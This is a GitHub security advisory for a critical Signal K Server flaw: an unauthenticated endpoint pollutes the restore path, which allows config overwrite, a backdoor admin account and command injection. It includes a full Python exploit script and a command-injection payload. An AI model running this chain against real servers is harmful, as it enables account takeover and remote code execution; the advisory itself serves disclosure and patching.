Skip to content

Signal K Server has Unauthenticated State Pollution leading to Remote Code Execution (RCE)

Critical severity GitHub Reviewed Published Jan 1, 2026 in SignalK/signalk-server • Updated Jan 2, 2026

Package

npm signalk-server (npm)

Affected versions

< 2.19.0

Patched versions

2.19.0

Description

Summary

An unauthenticated attacker can pollute the internal state (restoreFilePath) of the server via the /skServer/validateBackup endpoint. This allows the attacker to hijack the administrator's "Restore" functionality to overwrite critical server configuration files (e.g., security.json, package.json), leading to account takeover and Remote Code Execution (RCE).

Details

The vulnerability is caused by the use of a module-level global variable restoreFilePath in src/serverroutes.ts, which is shared across all requests.

Vulnerable Code Analysis:

  1. Global State: restoreFilePath is defined at the top level of the module. 
    // src/serverroutes.ts
let restoreFilePath: string
  2. Unauthenticated State Pollution: The /skServer/validateBackup endpoint updates this variable. Crucially, this endpoint lacks authentication middleware, allowing any user to access it. 
    app.post(`${SERVERROUTESPREFIX}/validateBackup`, (req, res) => {
  // ... handles file upload ...
  restoreFilePath = fs.mkdtempSync(...) // Attacker controls this path
})
  3. Restore Hijacking: The /skServer/restore endpoint uses the polluted restoreFilePath to perform the restoration. 
    app.post(`${SERVERROUTESPREFIX}/restore`, (req, res) => {
  // ...
  const unzipStream = unzipper.Extract({ path: restoreFilePath }) // Uses polluted path
  // ...
})

Exploit Chain:

  1. Pollution: Attacker uploads a malicious zip file to /validateBackup. The server saves it and updates restoreFilePath to point to this malicious file.
  2. Hijacking: When /restore is triggered (either by the attacker if they have access, or by a legitimate admin), the server restores the attacker's malicious files.
  3. Backdoor: The attacker overwrites security.json to add a new administrator account.
  4. RCE: Using the new admin account, the attacker exploits a separate Command Injection vulnerability in the App Store (/skServer/appstore/install/...) to execute arbitrary system commands (e.g., npm install injection).

PoC

Here is a complete Python script to reproduce the full exploit chain.

import requests
import zipfile
import io
import json
import time

# Configuration
TARGET_URL = "http://localhost:3000"
BACKDOOR_USER = "hacker"
BACKDOOR_PASS = "hacked1234"

def step1_plant_backdoor():
    print("[*] Step 1: Planting Backdoor via State Pollution...")
    
    # 1. Create malicious zip with security.json
    zip_buffer = io.BytesIO()
    with zipfile.ZipFile(zip_buffer, 'w') as z:
        # Add backdoor admin user
        security_config = {
            "users": [{
                "username": BACKDOOR_USER,
                "password": BACKDOOR_PASS, 
                "permissions": "admin"
            }]
        }
        z.writestr("security.json", json.dumps(security_config))
        # Enable security to make the backdoor effective
        z.writestr("settings.json", json.dumps({"security": {"strategy": "./tokensecurity"}}))
    zip_buffer.seek(0)

    # 2. Pollute State (Unauthenticated)
    print("    [+] Sending malicious backup to /validateBackup...")
    res = requests.post(f"{TARGET_URL}/skServer/validateBackup", 
                        files={'file': ('malicious.zip', zip_buffer, 'application/zip')})
    if res.status_code != 200:
        print("    [-] Failed to pollute state.")
        return False

    # 3. Trigger Restore (Hijacking)
    print("    [+] Triggering restore to overwrite server config...")
    # Note: In a real attack, if /restore is protected, attacker waits for admin to use it.
    # Here we assume we can trigger it or security is currently off.
    res = requests.post(f"{TARGET_URL}/skServer/restore", json={"security.json": True, "settings.json": True})
    
    if res.status_code in [200, 202]:
        print("    [+] Restore triggered successfully. Backdoor planted.")
        print("    [!] PLEASE RESTART THE SERVER to load the new configuration.")
        return True
    else:
        print(f"    [-] Restore failed: {res.status_code} {res.text}")
        return False

def step2_execute_rce():
    print("\n[*] Step 2: Executing RCE as Backdoor User...")
    
    # 1. Login
    session = requests.Session()
    login_payload = {"username": BACKDOOR_USER, "password": BACKDOOR_PASS}
    res = session.post(f"{TARGET_URL}/signalk/v1/auth/login", json=login_payload)
    
    if res.status_code != 200:
        print("    [-] Login failed. Did you restart the server?")
        return
    
    token = res.json()['token']
    print("    [+] Login successful. Authenticated as Admin.")

    # 2. RCE Payload (Windows Example)
    # Injecting command into version parameter of npm install
    # Command: echo RCE_SUCCESS > rce_proof.txt
    cmd_payload = "1.0.0 & echo RCE_SUCCESS > rce_proof.txt &"
    
    # We need a valid package name to bypass existence check
    package_name = "@signalk/freeboard-sk" 
    
    print(f"    [+] Sending RCE payload: {cmd_payload}")
    headers = {'Authorization': f'Bearer {token}'}
    try:
        session.post(f"{TARGET_URL}/skServer/appstore/install/{package_name}/{cmd_payload}", 
                     headers=headers, timeout=5)
    except:
        pass # Timeout is expected as the command might hang or take time

    print("    [+] Payload sent. Check for 'rce_proof.txt' in server root.")

if __name__ == "__main__":
    # Run Step 1, then restart server manually, then Run Step 2
    # step1_plant_backdoor()
    step2_execute_rce()

Impact

Remote Code Execution (RCE), Account Takeover, Denial of Service.
Verified: RCE is demonstrated by creating a file named rce_proof.txt containing the text "RCE_SUCCESS" on the server filesystem using the exploit chain.

References

@tkurki tkurki published to SignalK/signalk-server Jan 1, 2026
Published by the National Vulnerability Database Jan 1, 2026
Published to the GitHub Advisory Database Jan 2, 2026
Reviewed Jan 2, 2026
Last updated Jan 2, 2026

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(34th percentile)

Weaknesses

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. Learn more on MITRE.

Improper Control of Dynamically-Managed Code Resources

The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements. Learn more on MITRE.

CVE ID

CVE-2025-66398

GHSA ID

GHSA-w3x5-7c4c-66p9

Source code

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.